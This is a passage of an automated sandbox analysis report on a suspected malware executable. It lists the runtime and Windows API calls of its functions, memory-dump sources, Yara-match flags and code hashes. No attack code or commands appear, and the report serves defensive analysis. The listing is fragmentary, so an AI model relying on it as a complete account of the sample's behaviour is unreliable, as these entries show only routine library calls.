                                                                                                                                                                                                                                • API String ID: 2506810119-3024315271
                                                                                                                                                                                                                                • Opcode ID: 344658832b7440f505bc5ce5f5f759f624a1cc75f0f479e4bcaf167d51fbcba4
                                                                                                                                                                                                                                • Instruction ID: d3d55b427e4c4daae897b72b99cfa5c8ebbe14fd6a7011f2449b36805517904c
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 344658832b7440f505bc5ce5f5f759f624a1cc75f0f479e4bcaf167d51fbcba4
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3331C971D40218EFDB21DF99EC88EAEBBFCEF85310B104066E406D7221D7719A51CB50
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\lBb4XI4eGD.exe,00000104), ref: 0042F743
                                                                                                                                                                                                                                • _free.LIBCMT ref: 0042F80E
                                                                                                                                                                                                                                • _free.LIBCMT ref: 0042F818
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3953755338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: _free$FileModuleName
                                                                                                                                                                                                                                • String ID: C:\Users\user\Desktop\lBb4XI4eGD.exe
                                                                                                                                                                                                                                • API String ID: 2506810119-3024315271
                                                                                                                                                                                                                                • Opcode ID: 3308642da0636a63a4a634081c543339ebae9412bef6dab2f9d0c3185595a996
                                                                                                                                                                                                                                • Instruction ID: 9cabfb70e7d1101f7aa6931033736f2f7250cd8eb994997f94c6a7917a9720ec
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3308642da0636a63a4a634081c543339ebae9412bef6dab2f9d0c3185595a996
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7631B371B00228AFDB21DF9AAC8089FBBFCEF95314B90407BE80597211D7749E45CB99
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0214C8D4
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3955276422.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2140000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Exception@8Throw
                                                                                                                                                                                                                                • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                                                                                                                • API String ID: 2005118841-1866435925
                                                                                                                                                                                                                                • Opcode ID: 019f52a8e0bb9ff9f48767ebbe9764e79a713ad81fd208e44c7c6c06e0bc9c3a
                                                                                                                                                                                                                                • Instruction ID: 6e824225800069c3a0d190e795cb67cd6557b29c4246c7a2750afa1594d2440c
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 019f52a8e0bb9ff9f48767ebbe9764e79a713ad81fd208e44c7c6c06e0bc9c3a
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F4F02B73D816096FCB14E954CC01FFE33985B41305F04C077DE596A082EF699905CBD4
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • IsProcessorFeaturePresent.KERNEL32(00000017,00431F4D), ref: 0042DF89
                                                                                                                                                                                                                                • GetLastError.KERNEL32(00457910,00000010,00000003,00431F4D), ref: 0042DFC3
                                                                                                                                                                                                                                • ExitThread.KERNEL32 ref: 0042DFCA
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3953755338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ErrorExitFeatureLastPresentProcessorThread
                                                                                                                                                                                                                                • String ID: <(@
                                                                                                                                                                                                                                • API String ID: 3213686812-4189137628
                                                                                                                                                                                                                                • Opcode ID: 66e0b01c820f3c016cb479e2b3e6a53e6d0229a994ecfa947a89fafbf06fb01a
                                                                                                                                                                                                                                • Instruction ID: c42ad4fc6a3a459dd0b6f73910b388841d309234efd3d08c580d18ad64b54486
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 66e0b01c820f3c016cb479e2b3e6a53e6d0229a994ecfa947a89fafbf06fb01a
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CCF02761B8432635FA2037B27D0BBAB19150F14B0DF96003FFF0A995C3DEAC955040AD
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • IsProcessorFeaturePresent.KERNEL32(00000017,00431F4D), ref: 0042DF89
                                                                                                                                                                                                                                • GetLastError.KERNEL32(00457910,00000010,00000003,00431F4D), ref: 0042DFC3
                                                                                                                                                                                                                                • ExitThread.KERNEL32 ref: 0042DFCA
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3953755338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ErrorExitFeatureLastPresentProcessorThread
                                                                                                                                                                                                                                • String ID: <(@
                                                                                                                                                                                                                                • API String ID: 3213686812-4189137628
                                                                                                                                                                                                                                • Opcode ID: 7b487a85bde145f5f6618f4d2cac6f1d463b179069c0564edcd31255594901e1
                                                                                                                                                                                                                                • Instruction ID: 8d9534a8efac39963163d02413269ee71f33911fb9a211fcd458cde81c8fda17
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7b487a85bde145f5f6618f4d2cac6f1d463b179069c0564edcd31255594901e1
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 08F0A061B8431635FA203BA1BD0BB9619254F14B09F56002BBE0AA95D2DAA9955041AD
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • Concurrency::details::SchedulerProxy::DestroyVirtualProcessorRoot.LIBCONCRT ref: 004242E9
                                                                                                                                                                                                                                • std::invalid_argument::invalid_argument.LIBCONCRT ref: 004242FB
                                                                                                                                                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 00424309
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3953755338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Concurrency::details::DestroyException@8ProcessorProxy::RootSchedulerThrowVirtualstd::invalid_argument::invalid_argument
                                                                                                                                                                                                                                • String ID: pScheduler
                                                                                                                                                                                                                                • API String ID: 1381464787-923244539
                                                                                                                                                                                                                                • Opcode ID: 27a4b28832b8d2c4d1e169b8d68e757cb4f39c4e60a74ca0ff363d542ca72071
                                                                                                                                                                                                                                • Instruction ID: 0ab47ed57e3114165a5b8518f1ff4cdc14a790a58e52e99d458785ee7c9320ad
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 27a4b28832b8d2c4d1e169b8d68e757cb4f39c4e60a74ca0ff363d542ca72071
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E7F0A731B01224A7CB18FB56E852D9E73A99E40304791826FF806A3182DFBCA948C65D
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • Concurrency::details::FreeThreadProxy::ReturnIdleProxy.LIBCONCRT ref: 0041E62F
                                                                                                                                                                                                                                • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0041E642
                                                                                                                                                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0041E650
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3953755338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Concurrency::details::Exception@8FreeIdleProxyProxy::ReturnThreadThrowstd::invalid_argument::invalid_argument
                                                                                                                                                                                                                                • String ID: pContext
                                                                                                                                                                                                                                • API String ID: 1990795212-2046700901
                                                                                                                                                                                                                                • Opcode ID: 94c991bbb4e237fce74e38a70429fd430151592173fe111bbf2d82945a6f33d3
                                                                                                                                                                                                                                • Instruction ID: 74844cc6af7f8c94541e855de6513edd01ccc4ed259e70f51b8aa0ea99782ad2
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 94c991bbb4e237fce74e38a70429fd430151592173fe111bbf2d82945a6f33d3
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9EE06139B0011427CB04FB65DC06C5DB7A8AEC0714390413BF905A3381DFB8AD0585CC
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00415DAA
                                                                                                                                                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 00415DB8
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3953755338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Exception@8Throwstd::invalid_argument::invalid_argument
                                                                                                                                                                                                                                • String ID: pScheduler$version
                                                                                                                                                                                                                                • API String ID: 1687795959-3154422776
                                                                                                                                                                                                                                • Opcode ID: 464dda17272c5f92190f115bd46177522cd506029ea0a62d1c7ec35c5c4aaa01
                                                                                                                                                                                                                                • Instruction ID: 78896325b6b5d70010e1ee9e49f38da00e370817edf74f3b448257e365f7b275
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 464dda17272c5f92190f115bd46177522cd506029ea0a62d1c7ec35c5c4aaa01
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 99E08630900608F6CB14EE56D80EBDD77A45B51749F61C1277819610929BBC96C8CB4E
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3955276422.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2140000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: __alldvrm$_strrchr
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1036877536-0
                                                                                                                                                                                                                                • Opcode ID: 64c4271fdf953b23329a06ffcbcc4f91b3e2631876221f6b3ba7206c8ff3dfb5
                                                                                                                                                                                                                                • Instruction ID: 90f88ecec1e7706155aeaaf136d396f97cd9e21f4e16a9509fc1967ef8d29a95
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 64c4271fdf953b23329a06ffcbcc4f91b3e2631876221f6b3ba7206c8ff3dfb5
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 23A147B298038AAFD725CF18C8907BEBBB7EF81310F58416DDD959B281C73A8941CB50
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3953755338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: __alldvrm$_strrchr
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1036877536-0
                                                                                                                                                                                                                                • Opcode ID: c132ce8b7a779d48d325dc1464a826f382782a4d305ff920fa0063c7638d007e
                                                                                                                                                                                                                                • Instruction ID: bca4f3389f7aef3b321b47e138c454c1308b116cb1c02f017d73c82a305e3271
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c132ce8b7a779d48d325dc1464a826f382782a4d305ff920fa0063c7638d007e
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 65A14872A00B869FEB15DE18C8917AEFBE1EF19310F28426FD5859B381C23C9D41C759
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3955276422.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2140000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: _free
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 269201875-0
                                                                                                                                                                                                                                • Opcode ID: bd0f664e10209082f8b28efdae44aad90b5cc59672f94763d63ba3a93ec53303
                                                                                                                                                                                                                                • Instruction ID: f520086ca10b833e9aa398a1d4d93a2f2dbe8652e5c2102b5894a02224ff468d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bd0f664e10209082f8b28efdae44aad90b5cc59672f94763d63ba3a93ec53303
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7A410831AC0104AFDB246FB8CC48ABF3BB6EFC57B0F154615F52897690E73644528AA1
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3953755338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: _free
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 269201875-0
                                                                                                                                                                                                                                • Opcode ID: 84a4b3704c3f7d6daab1b53251b5dd7fc6fa1148bfcc679931bd75404ad43a52
                                                                                                                                                                                                                                • Instruction ID: f2494f1ef04ef44517cd1171a85dede66e5513e309315ffa42068036143921cc
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 84a4b3704c3f7d6daab1b53251b5dd7fc6fa1148bfcc679931bd75404ad43a52
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 57410771E00210ABDB257BBADC42AAF7664EF5E374F14127FF41882391D73C590946A9
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000004,00000000,0000007F,004497A0,00000000,00000000,8B56FF8B,0217046A,?,00000004,00000001,004497A0,0000007F,?,8B56FF8B,00000001), ref: 02176B41
                                                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 02176BCA
                                                                                                                                                                                                                                • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 02176BDC
                                                                                                                                                                                                                                • __freea.LIBCMT ref: 02176BE5
                                                                                                                                                                                                                                  • Part of subcall function 021738FE: RtlAllocateHeap.NTDLL(00000000,0214DACD,00000000), ref: 02173930
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3955276422.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2140000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2652629310-0
                                                                                                                                                                                                                                • Opcode ID: 6691954612650c490b0f1db7a760fe6ab7f85cafeb43cd7dd41aaf3ed81f1cf0
                                                                                                                                                                                                                                • Instruction ID: 7969055c0a79a3105b06c5764167ab701444e49f5a71b9eb6d5c0e6918e45284
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6691954612650c490b0f1db7a760fe6ab7f85cafeb43cd7dd41aaf3ed81f1cf0
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DD310F72A4064AAFDF258F74CC84EAE7BB9EF85714F090268EC04D7290EB35D950CB90
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3955276422.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2140000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Xtime_diff_to_millis2_xtime_get
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 531285432-0
                                                                                                                                                                                                                                • Opcode ID: 100972eb18cca990445868258ca18565aedc37090e71be810c06a2a5d3a0331b
                                                                                                                                                                                                                                • Instruction ID: c2eef9da1939984a11d23e6988828121fdb9e999ad6bf262d073e9585038ff3b
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 100972eb18cca990445868258ca18565aedc37090e71be810c06a2a5d3a0331b
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3B214C75A40209AFDF04EFA4EC819BEB7B9FF09714F1000A9E509A7250DB74AD028FA1
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3953755338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Xtime_diff_to_millis2_xtime_get
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 531285432-0
                                                                                                                                                                                                                                • Opcode ID: 9c244af1b80992c8c5c11ff33a9a240242c4a027173cbb81dbc6de2572cd5d43
                                                                                                                                                                                                                                • Instruction ID: d103751f5e86bb577f21b0ef41fc0747bac1fbbf4bb65c452d8b20089be38efe
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9c244af1b80992c8c5c11ff33a9a240242c4a027173cbb81dbc6de2572cd5d43
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A7217C75E0021A9FDF00EFA5CC829AEB7B8EF09714F10007AF901B7291D778AD058BA5
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • SetEvent.KERNEL32(?,00000000), ref: 00423729
                                                                                                                                                                                                                                • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00423711
                                                                                                                                                                                                                                  • Part of subcall function 0041B71C: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 0041B73D
                                                                                                                                                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0042375A
                                                                                                                                                                                                                                • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00423783
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3953755338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Context$Event$Base::Concurrency::details::$ThrowTrace$Exception@8
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2630251706-0
                                                                                                                                                                                                                                • Opcode ID: 0708c55e9bf2983c6b837536b85e823e81494798a28270a3cf60b9b0231776e7
                                                                                                                                                                                                                                • Instruction ID: fbbc1a7e5a16338d661a11365c58371bffdd4c48ac4c368ddaba424d9e7313e5
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0708c55e9bf2983c6b837536b85e823e81494798a28270a3cf60b9b0231776e7
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5911E9747002146BCF04AF659C85DAEB765EB84761B144067FA059B392CBAC9D41C698
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • ShowWindow.USER32(00000005), ref: 00401FA5
                                                                                                                                                                                                                                • UpdateWindow.USER32 ref: 00401FAD
                                                                                                                                                                                                                                • ShowWindow.USER32(00000000), ref: 00401FC1
                                                                                                                                                                                                                                • MoveWindow.USER32(00000000,00000000,00000001,00000001,00000001), ref: 00402024
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3953755338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Window$Show$MoveUpdate
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1339878773-0
                                                                                                                                                                                                                                • Opcode ID: 2df54f1dd07e67e892bb3b2eb89b8a5dbc035376ab2a5a7ebcd4eb7b767f49c1
                                                                                                                                                                                                                                • Instruction ID: 53ee9dd5e88c5c6849e3e7895ae91ae42f7fd804de43801a61d80981d891571f
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2df54f1dd07e67e892bb3b2eb89b8a5dbc035376ab2a5a7ebcd4eb7b767f49c1
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 90016531E006109BC7258F19ED04A267BA7FFD5712B15803AF40C972B1D7B1AC428B9C
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • ___BuildCatchObject.LIBVCRUNTIME ref: 0216933A
                                                                                                                                                                                                                                  • Part of subcall function 02169287: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 021692B6
                                                                                                                                                                                                                                  • Part of subcall function 02169287: ___AdjustPointer.LIBCMT ref: 021692D1
                                                                                                                                                                                                                                • _UnwindNestedFrames.LIBCMT ref: 0216934F
                                                                                                                                                                                                                                • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 02169360
                                                                                                                                                                                                                                • CallCatchBlock.LIBVCRUNTIME ref: 02169388
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3955276422.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2140000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 737400349-0
                                                                                                                                                                                                                                • Opcode ID: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
                                                                                                                                                                                                                                • Instruction ID: cad6dd1a9e2ebacb94a89c2184e3625bf28bef117c5c481ade8454c82418f55e
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D101C972140149BBDF115E958D48EEF7B6AEF98754F054018FE1866120D736E8719BA0
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • ___BuildCatchObject.LIBVCRUNTIME ref: 004290D3
                                                                                                                                                                                                                                  • Part of subcall function 00429020: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 0042904F
                                                                                                                                                                                                                                  • Part of subcall function 00429020: ___AdjustPointer.LIBCMT ref: 0042906A
                                                                                                                                                                                                                                • _UnwindNestedFrames.LIBCMT ref: 004290E8
                                                                                                                                                                                                                                • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 004290F9
                                                                                                                                                                                                                                • CallCatchBlock.LIBVCRUNTIME ref: 00429121
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3953755338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 737400349-0
                                                                                                                                                                                                                                • Opcode ID: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
                                                                                                                                                                                                                                • Instruction ID: 9a28eba3c49a40873050ba514f30250a61a7a586528b59ff06f814ea835fedb3
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 55014032200159BBDF116E96EC41EEB7F7AEF48758F444009FE4896121C73AEC61DBA8
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,0217512D,00000000,00000000,00000000,00000000,?,021753E5,00000006,0044A378), ref: 021751B8
                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,0217512D,00000000,00000000,00000000,00000000,?,021753E5,00000006,0044A378,0044A370,0044A378,00000000,00000364,?,02172203), ref: 021751C4
                                                                                                                                                                                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0217512D,00000000,00000000,00000000,00000000,?,021753E5,00000006,0044A378,0044A370,0044A378,00000000), ref: 021751D2
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3955276422.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2140000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3177248105-0
                                                                                                                                                                                                                                • Opcode ID: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
                                                                                                                                                                                                                                • Instruction ID: 887438f847b1c09ca44a210834e5ac62c2415d403885ed8490d7d9fb21efc480
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D901F736692322BBC7218F699C44A5677A9AF86FA37610634FD06D7180CB30D901CAE4
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,00434EC6,?,00000000,00000000,00000000,?,0043517E,00000006,FlsSetValue), ref: 00434F51
                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00434EC6,?,00000000,00000000,00000000,?,0043517E,00000006,FlsSetValue,0044A370,FlsSetValue,00000000,00000364,?,00431F9C), ref: 00434F5D
                                                                                                                                                                                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00434EC6,?,00000000,00000000,00000000,?,0043517E,00000006,FlsSetValue,0044A370,FlsSetValue,00000000), ref: 00434F6B
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3953755338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Similarity
